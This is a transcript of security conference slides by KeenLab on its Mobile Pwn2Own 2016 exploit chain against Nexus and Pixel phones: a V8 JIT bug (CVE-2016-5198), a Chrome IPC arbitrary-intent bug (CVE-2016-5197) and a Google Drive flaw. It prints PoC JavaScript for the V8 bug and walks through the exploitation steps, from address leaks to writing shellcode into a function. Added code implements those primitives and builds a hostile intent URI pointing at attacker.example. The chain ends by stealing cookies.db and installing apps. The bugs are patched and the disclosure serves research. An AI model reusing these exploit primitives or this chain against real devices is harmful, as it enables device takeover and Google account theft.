Pwning the Nexus ™ of Every Pixel ™ - Flanker Sky
TRANSCRIPT
![Page 1: Pwning the Nexus ™ of Every Pixel ™ - Flanker Sky](https://reader030.vdocuments.net/reader030/viewer/2022012608/619bd8250f744577f025ae8f/html5/thumbnails/1.jpg)
Pwning the Nexus ™ of Every Pixel ™
Qidan He. Credits also to: Gengming Liu
* Nexus and Pixel are registered trademarks of Google Inc.
#whoami
• Qidan He
  • Senior Security Researcher at KeenLab
  • Apple/Android/Chrome CVE hunter ("frequent creditor")
  • Speaker at BlackHat USA/ASIA, DEFCON, RECON, CanSecWest, HITCON, QMSS
  • Pwn2Own 2016 / Mobile Pwn2Own 2016 winner
• Gengming Liu
  • Security Researcher Intern at KeenLab
  • CTF enthusiast, DEFCON CTF final player
  • Captain of AAA CTF team
  • Mobile Pwn2Own 2016 winner
About Tencent Keen Security Lab
• Previously known as KeenTeam
• 2016 PC/Mobile Master of Pwn
• Pwn2Own champions in 2013, 2014, 2015, 2016 (2017 currently running)
• Pwnie nominations in 2015, 2016
TL;DR: How we pwned the newest Nexus 6P / Pixel running Nougat
• Three bugs form a complete exploit chain
  • One V8 bug to compromise the renderer
  • One IPC bug to escape the sandbox
  • One bug in Gapps allows app install
• Google responded very quickly
  • V8 and IPC bugs fixed at midnight of 10.26 (CVE-2016-5197 and CVE-2016-5198)
  • Gapp update pushed on 10.27 (Google VRP credit)
Agenda
• Introduction and exploitation of the V8 engine
• Introduction and exploitation of the sandbox on Android
• How we pwned Nexus/Pixel on Mobile Pwn2Own 2016 with 3 bugs
• CVE-2016-5197 / 5198 / Google VRP bug
History of classical Chrome exploits
• MWR Labs, Pwn2Own 2013
  • Type confusion in WebKit
  • Arbitrary zero write in IPC::OnContentBlocked
• PinkiePie, Mobile Pwn2Own 2013
  • Runtime_TypedArrayInitializeFromArrayLike for renderer code execution
  • Arbitrary free in ClipboardHostMsg_WriteObjectsAsync
• Geohot in Pwnium 4
  • Property redefinition leads to OOB read/write in the renderer
  • Spoof IPC message to a vulnerable extension in a privileged domain
• Lokihart in Pwn2Own 2015
  • TOCTOU in GPU process shared memory
• Juri in Pwn2Own 2015
  • UAF in P2PSocketDispatcherHost
V8 JavaScript Engine
• Widely known and used
• Runtime optimization and JIT to machine code
  • Strongtalk
  • Crankshaft
  • Turbofan
Object structure in V8
var a = new ArrayBuffer(0x6161)

```text
0x2036cb90a089: [JSArrayBuffer]
 - map = 0xebbd6702db1 [FastProperties]
 - prototype = 0x32cfe5005599
 - elements = 0x1b6415782241 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
 - internal fields: 2
 - backing_store = 0x5652757bea60
 - byte_length = 24929
 - properties = {}
 - internal fields = {0 0}
```
The same object in the debugger (object address minus the tag bit): map, properties, elements, byte_length stored as a Smi (0x6161 in the upper 32 bits), backing_store.

```text
pwndbg> x/30xg 0x00002036cb90a088
0x2036cb90a088: 0x00000ebbd6702db1 0x00001b6415782241
0x2036cb90a098: 0x00001b6415782241 0x0000616100000000
0x2036cb90a0a8: 0x00005652757bea60 0x0000000000000004
```
Boxing in V8
• Float & Double are encapsulated in the V8 heap as a HeapNumber object
  • the value field is written with vmovsd QWORD PTR [rax+0x7],xmm0
• SMI
  • small integer kept directly in the tagged word, lowest bit set to 0 (31-bit payload on 32-bit builds; on the 64-bit build dumped above the 32-bit value sits in the upper half of the word, e.g. byte_length 0x6161 appears as 0x0000616100000000)
• Tagged pointer (lowest bit set to 1)
CVE-2016-5198 – Chain of Bugs #1
• Found by KeenLab and used for Mobile Pwn2Own 2016
• Affects all engines based on V8 and applications with WebView
How we exploited CVE-2016-5198
CVE-2016-5198 by KeenLab
JIT workflow overview
• JIT compiler modes
  • Interpreted mode: on startup, naive, slow, safe
  • Optimized mode: after profiling, fast
• Optimized code is generated according to the type info collected
  • What if the object type changed?
  • The map type check will fail: deoptimize and regenerate
Deoptimization
• Eager deoptimization
  • Usually seen in function argument checks
  • Bail out to interpreted mode immediately
• Lazy deoptimization
  • Usually seen on global object access
  • Whoever changes the object is responsible for patching the following users
• What if the changer itself is also JITed?
OOB in optimized JIT code
```javascript
// Variant 1: trigger through plain warm-up loops (no d8 flags needed).
// Ctor replaces the global `n` with a fresh Set that owns no properties;
// Check stores a double-valued property `xyz` on it. Once both are
// optimized, the store in Check assumes `n` already has `xyz` in place.
var n;
function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;
  parseInt('AAAAAAAA');
}
for (var i = 0; i < 2000; ++i) { Ctor(); }
for (var i = 0; i < 2000; ++i) { Check(); }
Ctor();
Check();
print("finish");   // d8 builtin
```

```javascript
// Variant 2: the same sequence forced with natives syntax; run with
//   d8 --allow-natives-syntax poc.js
var n;
function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;
}
Ctor();
Ctor();
%OptimizeFunctionOnNextCall(Ctor);
Ctor();
Check();
Check();
%OptimizeFunctionOnNextCall(Check);
Check();
Ctor();     // optimized Ctor installs a property-less Set into n
Check();    // optimized Check writes through the stale property layout
parseInt('AAAAAAAA');   // final step of the PoC
```
What does the JIT do?
OOB in optimized JIT code
Optimized code for Ctor
Non-optimized code for func `Check`
Optimized code for func `Check`
Optimized code for `Check`, loading the global variable n:

```text
0x3f938587243  35  48b8c1bf4a339d070000  REX.W movq rax,0x79d334abfc1  ;; object: 0x79d334abfc1 PropertyCell for 0x130199d54631 <a Set with map 0x1ffdd430c391>
0x3f93858724d  45  488b400f              REX.W movq rax,[rax+0xf]
```
# js: Get global variable n
Optimized code for `n.xyz = 0x826852f4` (the double 0x41e04d0a5e800000 is 0x826852f4 in IEEE754):

```text
0x3f938587251  49  49ba0000805e0a4de041  REX.W movq r10,0x41e04d0a5e800000
0x3f93858725b  59  c4c1f96ec2            vmovq xmm0,r10
0x3f938587260  64  488b4007              REX.W movq rax,[rax+0x7]
0x3f938587264  68  488b400f              REX.W movq rax,[rax+0xf]
0x3f938587268  72  c5fb114007            vmovsd [rax+0x7],xmm0
```
Heap number overwrite
[Diagram, normal case, JavaScript: n.xyz = 0x31337. PropertyCell n (0x79d334abfc1; map PROP_CELL_MAP 0x2ab4ce002a99, value) --mov rax,QWORD PTR [rax+0xf]--> JSSet 0x130199d5c511 (map JS_SET_TYPE_MAP, properties, elements, tables) --mov rax,QWORD PTR [rax+0x7]--> non-empty properties FixedArray (map, length: 1, Property1 …); the store lands in Property1 and writes 0x31337.]
• Optimized code assumes the object already has the property
• No map type check
However…
• What if the object is changed and it doesn't have the property now?
• And the map check is eliminated in the generated code…
• ASSUMPTION INVALID!
[Diagram, after Ctor() replaced n: PropertyCell n (0x79d334abfc1; map PROP_CELL_MAP 0x2ab4ce002a99) --mov rax,QWORD PTR [rax+0xf]--> JSSet 0x130199d5c511 (map JS_SET_TYPE_MAP, properties, elements, tables) --mov rax,QWORD PTR [rax+0x7]--> the shared empty FixedArray (map, length: 0). The Property1 slot the optimized code expects (non-empty FixedArray: map, length: 1, Property1) lies past the end of the empty array, on top of what follows it in memory: the #null string (map, hashcode, length, chars). OUT OF BOUNDS HERE!]
[Diagram, n.xyz = 0x826852f4: mov rax,QWORD PTR [rax+0xf]; mov rax,QWORD PTR [rax+0x7] run past the empty FixedArray (map, length: 0) and pick up the #null string's map (the map for ONE_BYTE_INTERNALIZED_STRING_TYPE: map, … type, …); vmovsd QWORD PTR [rax+0x7],xmm0 then writes 0x41e04d0a5e800000 over that map's type word. The string is confused into an EXTERNAL_STRING, so its chars field (map, hashcode, length, chars) is interpreted as a pointer: 0x4141414141.. ("AAAA"), followed by mov rax,QWORD PTR [rax+0xf].]
Exploitation steps
• OOB write the chars field of the #null string to leak an ArrayBuffer address
• Overwrite the ArrayBuffer backing_store to leak the Function code address
• Overwrite the ArrayBuffer backing_store with the Function code address
• Write shellcode to the ArrayBuffer and exec!
Primitives
• Write primitive: sequential write
  • n.b = 0x31337: HeapNumber write
  • *(p+8) = v
• Read primitive
  • ArrayBuffer storage is our friend
  • HeapNumber-overwrite ArrayBuffer_len_ptr (storage-8)
  • But first… leak an ArrayBuffer address to know where to write to
  • Use the #null string to cold start!

Structure of ONE_BYTE_INTERNALIZED_STRING (map, hashcode, length as Smi 4, chars "null"):

```text
pwndbg> job 0x28b4ff7ab259
#null
pwndbg> x/40xg 0x28b4ff7ab258
0x28b4ff7ab258: 0x0000090b4b182361 0x000000005887594a
0x28b4ff7ab268: 0x0000000400000000 0xdeadbeed6c6c756e
```
#null string as cold start – Run #1
• OOB write the null string's length
• OOB write the chars field
  • m.d = ab (new ArrayBuffer)
  • new String(null)
• charCodeAt for each byte
• ArrayBuffer and #null string addresses leaked!
• Turn the limited sequential write into an arbitrary address write
[Diagram, run #1 layout: empty FixedArray (map, length: 0) followed by the #null string (map, hashcode, length, chars), then var ab = new ArrayBuffer(40000). Successive properties of m land on successive words: m.a = m.a leaves the map unchanged; m.c = 0x200000 overwrites length; m.d = null_str makes chars the #null pointer; m.e = ab makes chars the ab pointer.]
Note: we can assign an object to a field but cannot directly assign a pointer to a field such as `hashcode` (the store will dereference the field as a pointer and write the value wrapped as a float, 64 bit!)
#null string as cold start – Run #2
• Perform the HeapNumber overwrite in the next optimization run
• m.d = unpackIEEE754(ab_len_addr)
[Diagram, run #2: same layout (empty FixedArray: map, length: 0; #null string: map (overwritten), length, chars; var ab = new ArrayBuffer(40000); m.a = m.a unchanged, m.c = 0x200000 overwritten). m.d = *float*(ab_len_ptr) points chars at the ArrayBuffer's length field (ArrayBuffer: map, properties, elements, length, storage).]
Play with Function – Run #3
• Function allocated at the beginning
• ab_storage_ptr = ab_len_ptr + 8
• m.b = unpackIEEE754(addr_of_code - 8)
• Can arbitrary read now... read what?
• During startup the Function address also lies before the ArrayBuffer
• HeapNumber overwrite: *ab_storage_ptr = code_loc – 8
• code_ptr = ab[3] << 32 + ab[2]
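The value encodings that the Boxing slide, Run #1, Run #2, Run #3 and the final run rely on, as an added example that is not from the KeenLab slides: plain JavaScript (Node or d8) that reproduces the encodings without touching V8 internals. Function names are my own (the slides call the integer-to-double conversion unpackIEEE754); the sample bytes are the #null string words from the slides' pwndbg dump, the code address is the Function address from the later dump, and the five "shellcode" bytes are a constructed stub (push rbp; mov rbp,rsp; ret).

```javascript
"use strict";
// Added example, not the slides' code: value encodings used by the exploit.

const scratch = new DataView(new ArrayBuffer(8));

// Boxing: a double property lives in a HeapNumber whose value field is
// written by vmovsd [rax+0x7],xmm0. A double whose raw bits are an address
// therefore plants that address in memory when stored through the
// confused HeapNumber write.
function u64ToF64(u) {                      // the slides' unpackIEEE754()
  scratch.setBigUint64(0, BigInt.asUintN(64, BigInt(u)), true);
  return scratch.getFloat64(0, true);
}
function f64ToU64(d) {
  scratch.setFloat64(0, d, true);
  return scratch.getBigUint64(0, true);
}

// Smi on the x64 build seen in the dumps: value in the upper 32 bits, low
// half zero. Heap pointers carry tag bit 1, so the low bit tells them apart.
function smiTag(v) { return BigInt.asUintN(64, BigInt(v) << 32n); }
function smiUntag(w) { return Number(BigInt.asIntN(32, w >> 32n)); }
function isSmi(w) { return (w & 1n) === 0n; }
function untagPointer(w) { return w - 1n; }

// Run #1: once the #null string's chars field points at an object,
// charCodeAt() returns that object's raw bytes; fold eight of them
// (little-endian) back into a qword.
function leakQword(str, off = 0) {
  let v = 0n;
  for (let i = 7; i >= 0; i--) {
    v = (v << 8n) | BigInt(str.charCodeAt(off + i) & 0xff);
  }
  return v;
}

// Run #3: code_ptr = ab[3] << 32 | ab[2], read through a Uint32Array view.
function qwordAt(u32, idx) {
  return (BigInt(u32[idx + 1]) << 32n) | BigInt(u32[idx]);
}

// Final run: shellcode goes in through new Uint32Array(ab); bytes are
// packed little-endian and the tail word is padded with 0x90 (nop).
function writeShellcode(ab, bytes) {
  const words = new Uint32Array(ab);
  for (let i = 0; i < bytes.length; i += 4) {
    let w = 0;
    for (let j = 3; j >= 0; j--) {
      w = (w << 8) | (i + j < bytes.length ? bytes[i + j] : 0x90);
    }
    words[i / 4] = w >>> 0;
  }
  return words;
}

// Constructed sample input: the #null string bytes from the slides' dump
// (map 0x0000090b4b182361, hash 0x5887594a, length Smi 4, "null" + filler).
function demo() {
  const nullStringBytes = [
    0x61, 0x23, 0x18, 0x4b, 0x0b, 0x09, 0x00, 0x00,   // map (tagged pointer)
    0x4a, 0x59, 0x87, 0x58, 0x00, 0x00, 0x00, 0x00,   // hash
    0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,   // length as Smi
    0x6e, 0x75, 0x6c, 0x6c, 0xed, 0xbe, 0xad, 0xde,   // "null" + filler
  ];
  const leaked = String.fromCharCode(...nullStringBytes);
  const words = writeShellcode(new ArrayBuffer(8), [0x55, 0x48, 0x89, 0xe5, 0xc3]);
  return {
    mapPtr: untagPointer(leakQword(leaked, 0)),
    length: smiUntag(leakQword(leaked, 16)),
    lengthIsSmi: isSmi(leakQword(leaked, 16)),
    confusedStore: u64ToF64(0x41e04d0a5e800000n),   // the PoC's 0x826852f4
    codePtr: qwordAt(new Uint32Array([0, 0, 0x75784bc0, 0x2f8c]), 2),
    prologue: words[0],
    padded: words[1],
  };
}
```

The hashcode caveat on the Run #1 slide is visible here: u64ToF64() produces a Number, and assigning a Number to the property goes through the HeapNumber store, which dereferences the slot it finds; only assigning an object (m.d = ab) stores a tagged pointer without dereferencing.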
[Diagram, run #3: same layout, with the #null string's map now holding the #ab_len ptr (m.a = m.a unchanged, m.c = 0x200000 overwritten, chars now the ab ptr; var ab = new ArrayBuffer(40000)). m.b = *float*(code_ptr - 8) goes through the ArrayBuffer's storage field (overwritten) into the Function object (map, properties, elements, … CODE).]
Play with Function – Final run
• m.b = unpackIEEE754(code_ptr)
• *ab_storage_ptr = code_ptr
• Write shellcode with ab access
• Call the Function
• Game over! :)
[Diagram, final run: as in run #3, now with m.e = *float*(code_ptr), so the ArrayBuffer storage (overwritten) points straight at the Function's CODE.]
Write your shellcode on new Uint32Array(ab)!

```text
0x2f8c75784bc0 <Function:~ :1>:    0x8b485756e5894855 0x41830f498b482f4f
0x2f8c75784bd0 <Function:~ :1+16>: 0x000c50a53b49011b 0xfff57b20e8057300
0x2f8c75784be0 <Function:~ :1+32>: 0xbab9bb48a0458b49 0x4383000021ea1e72
0x2f8c75784bf0 <Function:~ :1+48>: 0x7a86e8501f79d10b 0x72bab9bb4858fff5
0x2f8c75784c00 <Function:~ :1+64>: 0x00ba49000021ea1e 0x4c00001800000000
0x2f8c75784c10 <Function:~ :1+80>: 0x900008c2c9075389 0xdeadbeed00000000
```
(the first bytes 55 48 89 e5 are push rbp; mov rbp,rsp, the function prologue)
So renderer code execution got…
• Now what?
The anatomy of the Chrome sandbox
• All untrusted code runs in the Target process
• Relay most operations to the Broker
• Try the best to lock down the capabilities of the renderer
• Even if the renderer is compromised, access is still strictly prohibited
• The GPU process has higher-level access than a normal sandboxed process
Process privileges in Android
[Diagram of the privilege ladder: isolated_app, untrusted_app, media, radio, adb shell, system_server, kernel]
State-of-the-art defense of the Android sandbox
• DAC, introduced by nature of Linux
• IsolatedProcess, introduced in Jelly Bean
• SELinux enforced in KitKat
• Further restricted in subsequent releases
So… how do we escape the sandbox in Mobile Pwn2Own 2016? Chain of Bugs #2
WebView in app is not isolated
• WebView still runs in the same uid/process as the ordinary app
• Find some app which accepts a controlled URL to attack
• Oops.. no BROWSABLE ones… but we have the IPC bug to the rescue!
```cpp
// src/content/renderer/render_view_impl.cc
void RenderViewImpl::LaunchAndroidContentIntent(const GURL& intent,
                                                size_t request_id,
                                                bool is_main_frame) {
  if (request_id != expected_content_intent_id_)
    return;

  // Remove the content highlighting if any.
  ScheduleComposite();

  if (!intent.is_empty()) {
    base::RecordAction(
        base::UserMetricsAction("Android.ContentDetectorActivated"));
    // The renderer decides the intent URL; the browser only forwards it.
    Send(new ViewHostMsg_StartContentIntent(GetRoutingID(), intent,
                                            is_main_frame));
  }
}
```
```cpp
bool RenderWidgetHostViewAndroid::OnMessageReceived(
    const IPC::Message& message) {
  // ...
  bool handled = true;
  IPC_BEGIN_MESSAGE_MAP(RenderWidgetHostViewAndroid, message)
    IPC_MESSAGE_HANDLER(ViewHostMsg_StartContentIntent, OnStartContentIntent)
    IPC_MESSAGE_HANDLER(ViewHostMsg_SmartClipDataExtracted,
                        OnSmartClipDataExtracted)
    IPC_MESSAGE_HANDLER(ViewHostMsg_ShowUnhandledTapUIIfNeeded,
                        OnShowUnhandledTapUIIfNeeded)
    IPC_MESSAGE_UNHANDLED(handled = false)
  IPC_END_MESSAGE_MAP()
  return handled;
}
```
```java
public void onStartContentIntent(Context context, String intentUrl, boolean isMainFrame) {
    Intent intent;
    // Perform generic parsing of the URI to turn it into an Intent.
    try {
        intent = Intent.parseUri(intentUrl, Intent.URI_INTENT_SCHEME);
        String scheme = intent.getScheme();
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
    } catch (Exception ex) {
        Log.w(TAG, "Bad URI %s", intentUrl, ex);
        return;
    }
    try {
        // Started as parsed: any package, component, action or extras the
        // renderer put into the URI string are honoured.
        context.startActivity(intent);
    } catch (ActivityNotFoundException ex) {
    }
}
```
CVE-2016-5197: Arbitrary intent start in the broker
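What the broker actually receives over ViewHostMsg_StartContentIntent, and the kind of check the "forbid opening untrusted URLs" mitigation discussed later adds, as an added example; this is not Chromium's or Google's code. buildIntentUri() mirrors the URI_INTENT_SCHEME layout that Intent.toUri() emits and parseIntentUri() the subset of Intent.parseUri() needed here (data, scheme, action, package, component, string extras); both are simplified models. The allowlist of schemes (tel, mailto, geo), the Google Drive package name, the attacker URL and all function names are assumptions, not taken from the slides.

```javascript
"use strict";
// Added example, not Chromium's code: intent: URIs as seen by the broker.

// "intent:" + data minus its scheme + "#Intent;" + key=value; pairs + "end"
function buildIntentUri({ data = "", action, pkg, component, extras = {} }) {
  let scheme = null;
  let rest = data;
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):(.*)$/s.exec(data);
  if (m) {
    scheme = m[1];
    rest = m[2];
  }
  const fields = [];
  if (scheme) fields.push("scheme=" + scheme);
  if (action) fields.push("action=" + action);
  if (pkg) fields.push("package=" + pkg);
  if (component) fields.push("component=" + component);
  for (const [k, v] of Object.entries(extras)) {
    fields.push("S." + k + "=" + encodeURIComponent(v));
  }
  return "intent:" + rest + "#Intent;" + fields.map((f) => f + ";").join("") + "end";
}

// Simplified model of Intent.parseUri(uri, URI_INTENT_SCHEME).
function parseIntentUri(uri) {
  if (!uri.startsWith("intent:")) throw new Error("not an intent: URI");
  const hash = uri.indexOf("#Intent;");
  if (hash < 0) throw new Error("missing #Intent; fragment");
  const intent = { data: null, scheme: null, action: null, pkg: null, component: null, extras: {} };
  let data = uri.slice("intent:".length, hash);
  for (const part of uri.slice(hash + "#Intent;".length).split(";")) {
    if (part === "end") break;
    const eq = part.indexOf("=");
    if (eq < 0) continue;
    const key = part.slice(0, eq);
    const value = decodeURIComponent(part.slice(eq + 1));
    if (key.startsWith("S.")) intent.extras[key.slice(2)] = value;
    else if (key === "package") intent.pkg = value;
    else if (key === "scheme" || key === "action" || key === "component") intent[key] = value;
  }
  if (intent.scheme) data = intent.scheme + ":" + data;   // scheme is re-attached
  intent.data = data.length ? data : null;
  return intent;
}

// Assumed policy: content detectors only hand off phone numbers, e-mail and
// street addresses, so only those schemes pass, and nothing naming an
// explicit target app (package/component) may pass.
const CONTENT_INTENT_SCHEMES = new Set(["tel", "mailto", "geo"]);

function isAllowedContentIntent(uri) {
  let intent;
  try { intent = parseIntentUri(uri); } catch (e) { return false; }
  if (intent.pkg || intent.component) return false;
  if (!intent.data) return false;
  const scheme = intent.data.split(":", 1)[0].toLowerCase();
  return CONTENT_INTENT_SCHEMES.has(scheme);
}

// Side by side: what a content detector legitimately sends, and the shape of
// what the compromised renderer sent in the chain (a VIEW intent aimed at
// Google Drive with the exploit page as data; package name and URL assumed).
function demo() {
  const legit = buildIntentUri({ data: "tel:+15555550100", action: "android.intent.action.DIAL" });
  const hostile = buildIntentUri({
    data: "https://attacker.example/exp.html",
    action: "android.intent.action.VIEW",
    pkg: "com.google.android.apps.docs",
  });
  return {
    legit,
    hostile,
    legitAllowed: isAllowedContentIntent(legit),
    hostileAllowed: isAllowedContentIntent(hostile),
  };
}
```

The point of the check is that the string crossing the IPC boundary is a complete Intent description: the renderer chooses package, component, action and extras, and the vulnerable handler above starts whatever parses. Filtering by scheme alone is not enough; an explicit package or component must also be rejected, which is why isAllowedContentIntent() tests both.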
CVE-2016-5197 by KeenLab
Mobile Pwn2Own Chain of Bugs #3
• See that holy Google Drive
  • Has full access to the Google account
  • Trusted by Google Play to "install" apps
• Blindly opens any intent-controlled URL
  • Pwn it to jump from isolated to untrusted
  • Plus app installation ability!
[Diagram: Sandbox (runs V8, isolated_app) --`Click` IPCs / startContentIntent(String)--> Broker (untrusted_app) --Intent with payload URL, Intent is added BROWSABLE--> Google Drive OpenUrlActivity (runs V8)]
Chain it all together
• Use CVE-2016-5198 to gain control of the renderer in the Chrome browser
  • Note: Chrome on Android is currently 32-bit
• Search for IPC objects, issue a ViewHostMsg_StartContentIntent request
• Jump to Google Drive, open the EXP page again
  • Note: Google Drive is a 64-bit app, so its WebView is also 64-bit
• Get a shell in the untrusted_app context from Google Drive
• Reload play.google.com, upload cookies.db from the app data directory
  • Or just send an intent to the Google Play app for it to install
• Send the install-app request, wait for BOOM
Mitigations?
• Forbid opening untrusted URLs (temporary solution)
• WebView multiprocess as the long-term solution
  • But what about devices pre-N?
• On-device confirmation when installing from play.google.com?
No Google Play / Google Drive, no concern?
• Vendors make more stupid mistakes
• Various app stores contain WebViews
• One even runs its WebView as system uid -_-!
Further thought
• Is it possible to apply WebView sandboxing at the application level on pre-N devices?
DEMO
Acknowledgements
• All colleagues at KeenLab
Questions?